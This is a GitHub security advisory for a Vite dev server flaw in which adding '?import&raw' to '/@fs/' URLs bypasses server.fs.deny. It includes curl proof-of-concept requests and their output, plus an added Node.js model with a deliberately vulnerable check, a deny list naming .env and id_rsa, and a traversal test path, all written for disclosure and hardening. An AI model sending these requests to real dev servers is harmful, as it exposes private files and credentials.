GHSA-9cwx-2883-4wfx

GitHub Security Advisory

Vite's `server.fs.deny` is bypassed when using `?import&raw`

✓ GitHub Reviewed MODERATE Has CVE

Advisory Details

### Summary
The contents of arbitrary files readable by the Vite dev server process can be returned to any client that can reach the server, regardless of the `server.fs` restrictions.

### Details
The `/@fs/` route lets the dev server return files by filesystem path, and Vite restricts it to the `server.fs.allow` list and rejects paths matched by `server.fs.deny` with a `403 Restricted` response. Appending `?import&raw` to the same URL turns the request into a module import that serves the file's contents as a JavaScript string export (`export default "..."`); that code path did not apply the same restriction, so the contents of any existing file the dev server can read are returned. The dev server has to be reachable by the requester; the PoC below uses a local server on its default port 5173. Fixed in vite 3.2.11, 4.5.4, 5.1.8, 5.2.14, 5.3.6 and 5.4.6.

### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

<body>
<h1>403 Restricted</h1>
<p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```
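As an added example (not Vite's own code nor part of the advisory), the following Node.js script models the decision the `/@fs/` route has to make. The allow root, the deny names and the `vulnerableDecision` / `hardenedDecision` functions are constructed for illustration; Vite's real check is glob based and more involved. The vulnerable shape shows how a check attached only to the static-file path is skipped when a module query such as `?import&raw` routes the request elsewhere; the hardened shape strips the query and normalizes the path before one shared check that every file-returning path must call.

```javascript
// Added example, not Vite's own code: a minimal model of the /@fs/ path check
// showing why the query string must be stripped before authorization and why
// the same check must run on every code path that can return file bytes.

// Constructed configuration standing in for server.fs.allow and server.fs.deny.
// Vite matches deny entries as globs; this simplification matches basenames only.
const ALLOW_ROOTS = ["/srv/vite-project"];
const DENY_BASENAMES = [".env", ".env.local", "id_rsa"];

// Collapse ".", ".." and repeated slashes so that "/a/../b" and "/b" compare equal.
function normalizePosix(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { out.pop(); continue; }
    out.push(seg);
  }
  return "/" + out.join("/");
}

// Map a request URL to the filesystem path it targets, or null if it is not an
// /@fs/ request. The query string ("?import&raw" included) only selects how the
// file is rendered, never which file, so it plays no part in the path.
// Throws on malformed percent-encoding; callers treat that as a refusal.
function fsPathFromUrl(url) {
  const u = new URL(url, "http://localhost"); // base only so relative URLs parse
  if (!u.pathname.startsWith("/@fs/")) return null;
  return normalizePosix(decodeURIComponent(u.pathname.slice("/@fs".length)));
}

// The single authorization rule: inside an allowed root and not a denied name.
function isAllowed(fsPath) {
  const inAllow = ALLOW_ROOTS.some(
    (root) => fsPath === root || fsPath.startsWith(root.replace(/\/+$/, "") + "/"),
  );
  const denied = DENY_BASENAMES.includes(fsPath.split("/").pop());
  return inAllow && !denied;
}

// Vulnerable shape, reproducing the advisory's behaviour (do not copy): the
// check is consulted by the static-file path only, so a URL carrying a module
// query ("?import", "?raw") takes the transform path and is served unchecked.
function vulnerableDecision(url) {
  const u = new URL(url, "http://localhost");
  const fsPath = fsPathFromUrl(url);
  if (fsPath === null) return "not-fs";
  if (u.searchParams.has("import") || u.searchParams.has("raw")) return "serve";
  return isAllowed(fsPath) ? "serve" : "403";
}

// Hardened shape: one decision on the query-stripped, normalized path, which
// both the static path and the module-transform path must call before reading.
function hardenedDecision(url) {
  let fsPath;
  try {
    fsPath = fsPathFromUrl(url);
  } catch {
    return "403"; // undecodable path: refuse rather than guess
  }
  if (fsPath === null) return "not-fs";
  return isAllowed(fsPath) ? "serve" : "403";
}

// Walk the advisory's two requests plus a few constructed variants through both shapes.
function compare() {
  const requests = [
    "/@fs/tmp/secret.txt",                               // the 403 case from the PoC
    "/@fs/tmp/secret.txt?import&raw",                    // the bypass from the PoC
    "/@fs/srv/vite-project/src/main.ts?import",          // legitimate module request
    "/@fs/srv/vite-project/.env?raw",                    // denied basename
    "/@fs/srv/vite-project/src/../../../tmp/secret.txt", // traversal out of the root
  ];
  return requests.map((url) => ({
    url,
    vulnerable: vulnerableDecision(url),
    hardened: hardenedDecision(url),
  }));
}

for (const row of compare()) {
  console.log(`${row.url}\n  vulnerable: ${row.vulnerable}  hardened: ${row.hardened}`);
}
```

The point of the model is the order of operations: derive the target path first (query removed, percent-decoding done, `..` collapsed), then authorize that path once, and only then let any serving mode, static or `?raw` import, read the file. A check that keys on the URL as received, or that lives in only one of several handlers, is exactly what a spare query parameter gets around.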

Affected Packages

npm vite
  >= 5.4.0, < 5.4.6   (fixed in 5.4.6)
  >= 5.3.0, < 5.3.6   (fixed in 5.3.6)
  >= 5.2.0, < 5.2.14  (fixed in 5.2.14)
  >= 5.0.0, < 5.1.8   (fixed in 5.1.8)
  >= 4.0.0, < 4.5.4   (fixed in 4.5.4)
  < 3.2.11            (fixed in 3.2.11)

Key Information

GHSA ID
GHSA-9cwx-2883-4wfx
Published
September 17, 2024 6:44 PM
Last Modified
September 19, 2024 6:34 PM
CVSS Score
5.0 /10
Primary Ecosystem
npm
Primary Package
vite
GitHub Reviewed
✓ Yes

Dataset

Last updated: September 16, 2025 6:29 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.